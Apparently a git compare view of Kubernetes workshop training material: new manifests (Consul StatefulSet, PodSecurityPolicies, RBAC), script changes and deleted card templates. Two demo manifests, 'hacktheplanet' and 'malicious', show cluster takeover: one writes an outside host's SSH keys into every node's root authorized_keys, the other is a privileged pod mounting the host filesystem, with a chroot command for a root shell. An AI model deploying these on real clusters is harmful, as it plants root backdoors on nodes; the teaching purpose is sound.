Compare commits: kadm-2019-… ... wwrk-2019-… (91 commits)
| SHA1 |
|---|
| a72148d51a |
| 2d2246db4e |
| 5872100101 |
| 8b98058f22 |
| a90dcf1d9a |
| 33f5a6b2ed |
| 56f2083a2b |
| 68a26ae501 |
| 2ef72a4dd8 |
| 48bd2a98bd |
| f4e16dccc4 |
| 918fa2091d |
| b22d3e3d21 |
| 7b8370dc12 |
| e56ab48070 |
| 50ad11a697 |
| db6d2c8188 |
| eb02875bd0 |
| 4ba954cae4 |
| 84b691a89d |
| 5447b187ac |
| d2a91c27c1 |
| a8605a9316 |
| 25e2f8eca8 |
| c1e9073781 |
| 6593f4ad42 |
| bde7f75881 |
| a6bd6a94e8 |
| 8650209381 |
| 25c820c87a |
| f8e0de3519 |
| b0aeac555d |
| f3b9340528 |
| 927484bcbc |
| 3a512779b2 |
| 8d0c568f5a |
| d987f21cba |
| 53c466e6ed |
| 9b130861ea |
| b28ed0bbfc |
| 1f08425437 |
| f69c9853bb |
| e48c23e4f4 |
| eb04aacb5e |
| 9504f81526 |
| 12ef2eb66e |
| e4311a3037 |
| 8672a11c3b |
| 65647d5882 |
| 7309304ced |
| 1bc7415c54 |
| 2fdede72f1 |
| 26c876174a |
| 70c91b121c |
| a7833a75b4 |
| 31e23477d6 |
| 4ba9d5e82e |
| 9775954b42 |
| 7ddda3456c |
| 747f7a07d4 |
| d4500eff5a |
| 0ba6adb027 |
| d3af9ff333 |
| c9dc6fa7cb |
| faf7e1af42 |
| 485704a169 |
| 72fa8c366b |
| 8ea4b23530 |
| 785a8178ca |
| 0dfff26410 |
| 5b4debfd81 |
| 4c44f3e690 |
| 940694a2b0 |
| c3de1049f1 |
| 116515d19b |
| 098671ec20 |
| 51e77cb62c |
| e2044fc2b2 |
| f795d67f02 |
| 6f6dc66818 |
| 0ae39339b9 |
| e6b73a98f4 |
| 03657ea896 |
| 4106059d4a |
| 2c0ed6ea2a |
| 3557a546e1 |
| d3dd5503cf |
| 82f8f41639 |
| dff8c1e43a |
| dc7c1e95ca |
| c367ad1156 |
k8s/hacktheplanet.yaml (new file, 34 lines)
@@ -0,0 +1,34 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: hacktheplanet
spec:
  selector:
    matchLabels:
      app: hacktheplanet
  template:
    metadata:
      labels:
        app: hacktheplanet
    spec:
      volumes:
      - name: root
        hostPath:
          path: /root
      tolerations:
      - effect: NoSchedule
        operator: Exists
      initContainers:
      - name: hacktheplanet
        image: alpine
        volumeMounts:
        - name: root
          mountPath: /root
        command:
        - sh
        - -c
        - "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
      containers:
      - name: web
        image: nginx
k8s/malicious-pod.yaml (new file, 21 lines)
@@ -0,0 +1,21 @@
apiVersion: v1
kind: Pod
metadata:
  name: malicious
spec:
  volumes:
  - name: slash
    hostPath:
      path: /
  containers:
  - image: alpine
    name: alpine
    securityContext:
      privileged: true
    command:
    - sleep
    - "1000000000"
    volumeMounts:
    - name: slash
      mountPath: /hostfs
  restartPolicy: Never
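A sketch of why this pod is dangerous, for anyone studying the demo: since it is privileged and mounts the host's `/` at `/hostfs`, chroot-ing into that mount yields a root shell on the node (the command below is a standard pattern, not something in this diff):

```bash
# Sketch: with the pod above running, drop into a root shell on the node.
kubectl apply -f k8s/malicious-pod.yaml
kubectl exec -it malicious -- chroot /hostfs sh
```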
k8s/persistent-consul.yaml (new file, 95 lines)
@@ -0,0 +1,95 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: consul
rules:
- apiGroups: [ "" ]
  resources: [ pods ]
  verbs: [ get, list ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: consul
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: consul
subjects:
- kind: ServiceAccount
  name: consul
  namespace: orange
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: consul
---
apiVersion: v1
kind: Service
metadata:
  name: consul
spec:
  ports:
  - port: 8500
    name: http
  selector:
    app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: consul
spec:
  serviceName: consul
  replicas: 3
  selector:
    matchLabels:
      app: consul
  volumeClaimTemplates:
  - metadata:
      name: data
    spec:
      accessModes:
      - ReadWriteOnce
      resources:
        requests:
          storage: 1Gi
  template:
    metadata:
      labels:
        app: consul
    spec:
      serviceAccountName: consul
      affinity:
        podAntiAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
          - labelSelector:
              matchExpressions:
              - key: app
                operator: In
                values:
                - consul
            topologyKey: kubernetes.io/hostname
      terminationGracePeriodSeconds: 10
      containers:
      - name: consul
        image: "consul:1.4.4"
        volumeMounts:
        - name: data
          mountPath: /consul/data
        args:
        - "agent"
        - "-bootstrap-expect=3"
        - "-retry-join=provider=k8s namespace=orange label_selector=\"app=consul\""
        - "-client=0.0.0.0"
        - "-data-dir=/consul/data"
        - "-server"
        - "-ui"
        lifecycle:
          preStop:
            exec:
              command:
              - /bin/sh
              - -c
              - consul leave
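Once the StatefulSet is up, a quick way to check that the three servers found each other — a sketch, assuming the manifests above were applied in the `orange` namespace, as the RoleBinding suggests:

```bash
# All three pods should eventually report each other as alive members.
kubectl -n orange exec consul-0 -- consul members

# The Service exposes the UI on port 8500:
kubectl -n orange port-forward svc/consul 8500:8500
```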
k8s/psp-privileged.yaml (new file, 39 lines)
@@ -0,0 +1,39 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: privileged
  annotations:
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
spec:
  privileged: true
  allowPrivilegeEscalation: true
  allowedCapabilities:
  - '*'
  volumes:
  - '*'
  hostNetwork: true
  hostPorts:
  - min: 0
    max: 65535
  hostIPC: true
  hostPID: true
  runAsUser:
    rule: 'RunAsAny'
  seLinux:
    rule: 'RunAsAny'
  supplementalGroups:
    rule: 'RunAsAny'
  fsGroup:
    rule: 'RunAsAny'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: psp:privileged
rules:
- apiGroups: ['policy']
  resources: ['podsecuritypolicies']
  verbs: ['use']
  resourceNames: ['privileged']
k8s/psp-restricted.yaml (new file, 38 lines)
@@ -0,0 +1,38 @@
---
apiVersion: extensions/v1beta1
kind: PodSecurityPolicy
metadata:
  annotations:
    apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
    apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
    seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
  name: restricted
spec:
  allowPrivilegeEscalation: false
  fsGroup:
    rule: RunAsAny
  runAsUser:
    rule: RunAsAny
  seLinux:
    rule: RunAsAny
  supplementalGroups:
    rule: RunAsAny
  volumes:
  - configMap
  - emptyDir
  - projected
  - secret
  - downwardAPI
  - persistentVolumeClaim
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: psp:restricted
rules:
- apiGroups: ['policy']
  resources: ['podsecuritypolicies']
  verbs: ['use']
  resourceNames: ['restricted']
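Note that the two ClusterRoles above only grant the `use` verb; neither policy takes effect until the role is bound to someone. A hedged sketch of a typical binding (the `system:serviceaccounts` group is our assumption for illustration, not something in this diff):

```yaml
# Sketch: let every service account fall back to the "restricted" policy.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: psp:restricted
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: psp:restricted
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: Group
  name: system:serviceaccounts
```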
k8s/users:jean.doe.yaml (new file, 33 lines)
@@ -0,0 +1,33 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: jean.doe
  namespace: users
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: users:jean.doe
rules:
- apiGroups: [ certificates.k8s.io ]
  resources: [ certificatesigningrequests ]
  verbs: [ create ]
- apiGroups: [ certificates.k8s.io ]
  resourceNames: [ users:jean.doe ]
  resources: [ certificatesigningrequests ]
  verbs: [ get, create, delete, watch ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: users:jean.doe
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: users:jean.doe
subjects:
- kind: ServiceAccount
  name: jean.doe
  namespace: users
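These rules let the `jean.doe` account drive the lifecycle of a CSR named `users:jean.doe` through the certificates API. A sketch of what that flow could look like (the key generation, CN/O subject values, and the `v1beta1` CSR version are era-appropriate assumptions, not part of this diff):

```bash
# Sketch: generate a key pair and submit a CertificateSigningRequest
# named users:jean.doe, matching the resourceNames rule above.
openssl genrsa -out jean.doe.key 2048
openssl req -new -key jean.doe.key -subj "/CN=jean.doe/O=users" -out jean.doe.csr

kubectl create -f - <<EOF
apiVersion: certificates.k8s.io/v1beta1
kind: CertificateSigningRequest
metadata:
  name: users:jean.doe
spec:
  request: $(base64 -w0 < jean.doe.csr)
  usages: [ digital signature, key encipherment, client auth ]
EOF
```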
k8s/volumes-for-consul.yaml (new file, 70 lines)
@@ -0,0 +1,70 @@
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node2
  annotations:
    node: node2
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node2
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node3
  annotations:
    node: node3
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node3
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node4
  annotations:
    node: node4
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node4
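One caveat worth remembering with `local` PersistentVolumes: Kubernetes will not create the backing directory, so `/mnt/consul` must already exist on each node. A sketch, assuming (as elsewhere in this repo) that the nodes are reachable over SSH as the `docker` user with sudo rights:

```bash
# Sketch: pre-create the backing directory on each node listed in the PVs.
for node in node2 node3 node4; do
  ssh docker@$node sudo mkdir -p /mnt/consul
done
```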
@@ -248,6 +248,14 @@ EOF"
|
||||
sudo tar -C /usr/local/bin -zx ship
|
||||
fi"
|
||||
|
||||
# Install the AWS IAM authenticator
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
|
||||
##VERSION##
|
||||
sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
|
||||
sudo chmod +x /usr/local/bin/aws-iam-authenticator
|
||||
fi"
|
||||
|
||||
sep "Done"
|
||||
}
|
||||
|
||||
@@ -383,6 +391,15 @@ _cmd_retag() {
    aws_tag_instances $OLDTAG $NEWTAG
}

_cmd ssh "Open an SSH session to the first node of a tag"
_cmd_ssh() {
    TAG=$1
    need_tag
    IP=$(head -1 tags/$TAG/ips.txt)
    info "Logging into $IP"
    ssh docker@$IP
}

_cmd start "Start a group of VMs"
_cmd_start() {
    while [ ! -z "$*" ]; do
@@ -481,12 +498,12 @@ _cmd_helmprom() {
    if i_am_first_node; then
        kubectl -n kube-system get serviceaccount helm ||
        kubectl -n kube-system create serviceaccount helm
-       helm init --service-account helm
+       sudo -u docker -H helm init --service-account helm
        kubectl get clusterrolebinding helm-can-do-everything ||
        kubectl create clusterrolebinding helm-can-do-everything \
            --clusterrole=cluster-admin \
            --serviceaccount=kube-system:helm
-       helm upgrade --install prometheus stable/prometheus \
+       sudo -u docker -H helm upgrade --install prometheus stable/prometheus \
            --namespace kube-system \
            --set server.service.type=NodePort \
            --set server.service.nodePort=30090 \
@@ -1,28 +0,0 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 1
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: dmuc
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: admin.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
@@ -1,28 +0,0 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: kubenet
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: admin.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
@@ -1,28 +0,0 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: kuberouter
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: admin.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
@@ -1,28 +0,0 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: test
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: admin.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
@@ -7,7 +7,7 @@ clustersize: 1
clusterprefix: node

# Jinja2 template to use to generate ready-to-cut cards
-cards_template: cards.html
+cards_template: jerome.html

# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
@@ -8,7 +8,7 @@ clusterprefix: node
cards_template: jerome.html

# Use "Letter" in the US, and "A4" everywhere else
-paper_size: A4
+paper_size: Letter

# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
@@ -1,29 +0,0 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 1
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: enix.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
|
||||
@@ -1,30 +0,0 @@
|
||||
# customize your cluster size, your cards template, and the versions
|
||||
|
||||
# Number of VMs per cluster
|
||||
clustersize: 5
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: Letter
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: test
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.18.0
|
||||
machine_version: 0.13.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
@@ -1,31 +0,0 @@
|
||||
# 3 nodes for k8s 101 workshops
|
||||
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: kube101.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: Letter
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
|
||||
@@ -1,30 +0,0 @@
|
||||
# This file is passed by trainer-cli to scripts/ips-txt-to-html.py
|
||||
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: Letter
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.22.0
|
||||
machine_version: 0.15.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
@@ -1,124 +0,0 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://FIXME.container.training" -%}
|
||||
{%- set pagesize = 9 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine virtuelle" -%}
|
||||
{%- set this_or_each = "cette" -%}
|
||||
{%- set plural = "" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "chaque" -%}
|
||||
{%- set plural = "s" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_kube -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
|
||||
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 15px;
|
||||
font-family: 'Slabo 27px';
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 30%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.3em;
|
||||
}
|
||||
|
||||
img.enix {
|
||||
height: 4.0em;
|
||||
margin-top: 0.4em;
|
||||
}
|
||||
|
||||
img.kube {
|
||||
height: 4.2em;
|
||||
margin-top: 1.7em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Voici les informations permettant de se connecter à un
|
||||
des environnements utilisés pour cette formation.
|
||||
Vous pouvez vous connecter à {{ this_or_each }} machine
|
||||
virtuelle avec n'importe quel client SSH.
|
||||
</p>
|
||||
|
||||
<p>
|
||||
<img class="enix" src="https://enix.io/static/img/logos/logo-domain-cropped.png" />
|
||||
<table>
|
||||
<tr><td>cluster:</td></tr>
|
||||
<tr><td class="logpass">{{ clusterprefix }}</td></tr>
|
||||
<tr><td>identifiant:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>mot de passe:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
</p>
|
||||
|
||||
<p>
|
||||
Adresse{{ plural }} IP :
|
||||
<!--<img class="kube" src="{{ image_src }}" />-->
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>{{ clusterprefix }}{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>Le support de formation est à l'adresse suivante :
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
@@ -1,106 +0,0 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://container.training/" -%}
|
||||
{%- set pagesize = 12 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine" -%}
|
||||
{%- set this_or_each = "this" -%}
|
||||
{%- set machine_is_or_machines_are = "machine is" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "orchestration workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "each" -%}
|
||||
{%- set machine_is_or_machines_are = "machines are" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_swarm -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 21.5%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.4em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Here is the connection information to your very own
|
||||
{{ cluster_or_machine }} for this {{ workshop_name }}.
|
||||
You can connect to {{ this_or_each }} VM with any SSH client.
|
||||
</p>
|
||||
<p>
|
||||
<img src="{{ image_src }}" />
|
||||
<table>
|
||||
<tr><td>login:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>password:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
|
||||
</p>
|
||||
<p>
|
||||
Your {{ machine_is_or_machines_are }}:
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>You can find the slides at:
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
@@ -1,121 +0,0 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://FIXME.container.training" -%}
|
||||
{%- set pagesize = 9 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine virtuelle" -%}
|
||||
{%- set this_or_each = "cette" -%}
|
||||
{%- set plural = "" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "chaque" -%}
|
||||
{%- set plural = "s" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_kube -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
|
||||
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 15px;
|
||||
font-family: 'Slabo 27px';
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
